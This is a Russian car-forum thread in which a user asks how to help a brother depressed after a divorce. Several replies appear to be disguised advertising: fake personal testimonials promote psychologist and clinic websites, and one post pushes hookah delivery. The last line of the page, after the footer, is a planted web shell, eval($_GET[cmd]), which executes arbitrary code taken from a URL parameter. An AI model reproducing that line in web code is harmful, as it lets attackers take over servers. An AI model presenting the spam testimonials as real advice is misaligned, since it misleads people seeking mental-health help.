+ Ответить в теме
Показано с 1 по 8 из 8

Тема: Как помочь брату в депрессии?


  1. #1

    Как помочь брату в депрессии?

    На фоне развода подозреваю мой брат стал очень депрессивным, я бы сказал что в глубокой депрессии. Живем оба в Питере, часто его вижу, а как ему помочь - даже не знаю, лишь поддерживаю как могу.

  2. #2
    Новичок Serf is on a distinguished road Аватар для Serf
    Регистрация
    05.04.2019
    Сообщений
    136
    Мда, может ему просто это нужно пережить? Ну т.е. разведется, смириться со временем, пережует все, начнет все сначала, в общем все так как обычно это бывает) Развод - это не конец света и он это поймет со временем.

  3. #3
    Поддерживайте своего брата дальше, по сути это единственное чем сможете ему помочь. Сейчас для него главное - это поддержка близких, особенно если он настолько сильно болезненно переносит развод.

  4. #4
    Новичок Devid is on a distinguished road Аватар для Devid
    Регистрация
    05.04.2019
    Сообщений
    132
    Может вам стоит посоветовать своему брату обратиться за помощью психолога где-то в СПБ? Например сюда - https://psy-health.online/ , судя по информации на сайте, данный психолог квалифицируется на таком роде проблем. Лично я уже давно хожу одному психологу и честно скажу- это мою жизнь поменяло. Психологи учат справляться с стрессовыми ситуациями самостоятельно и несколько десятков сеансов которые я провел у своего психолога многому меня научили.

  5. #5
    GTI-Racing Maxxxx is on a distinguished road Аватар для Maxxxx
    Регистрация
    08.10.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    383
    ребята, а кто с паническими атаками сталкивался?

  6. #6
    GTI-Racing Felhaghma is on a distinguished road Аватар для Felhaghma
    Регистрация
    23.10.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    482
    Цитата Сообщение от Maxxxx Посмотреть сообщение
    ребята, а кто с паническими атаками сталкивался?
    Приятель, который моего возраста достиг значительных успехов в карьере. Заинтересовался, как такое возможно в наше время. Он рассказал, что прошел терапевтический курс “Хватит бояться!”. С его помощью можно добиться значительных результатов. Понять, что я могу гораздо больше, чем думаю. Открыть новые пути для развития во всех сферах жизни, ощутить прилив сил и энергии для развития личности. Дать возможность разуму трансформироваться в лучшую версию. На сайте https://shafigullincenter.ru/panic-attack/ познакомился с расписанием курсов.

  7. #7
    Мимо проходил grankin2 is on a distinguished road Аватар для grankin2
    Регистрация
    03.09.2021
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    11
    Пусть закажет кальян на дом, вот видео, кстати, как эта услуга работает в спб.

  8. #8
    Новичок Rusik23 is on a distinguished road Аватар для Rusik23
    Регистрация
    25.10.2018
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    179
    Часто стала мучить депрессия, справиться самостоятельно с таким состоянием не мог, требовалась помощь квалифицированных специалистов. Искал информацию в интернете, заинтересовала клиника “Anima”, которая занимается различными психическими расстройствами. На сайте https://nlpsihoclinic.ru/ получил подробную информацию о работе клиники, ценовая политика доступная, персонал опытный, что позволило пройти комплексное лечение и восстановить психическое здоровье.

+ Ответить в теме

Похожие темы

  1. Памагите Брату
    от kashmap в разделе Шины, диски
    Ответов: 14
    Последнее сообщение: 09.04.2024, 10:16
  2. Как помочь брату?
    от Trety в разделе Курилка
    Ответов: 3
    Последнее сообщение: 07.04.2019, 20:47
  3. Просьба помочь.
    от KLENUH в разделе Отзывы / Выбор
    Ответов: 6
    Последнее сообщение: 01.04.2013, 03:00
  4. Кто может помочь с билетами?
    от Naduxa в разделе Курилка
    Ответов: 2
    Последнее сообщение: 17.09.2011, 21:05
  5. с ТО кто помочь может?
    от RABBIT в разделе Курилка
    Ответов: 0
    Последнее сообщение: 27.06.2009, 13:50

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}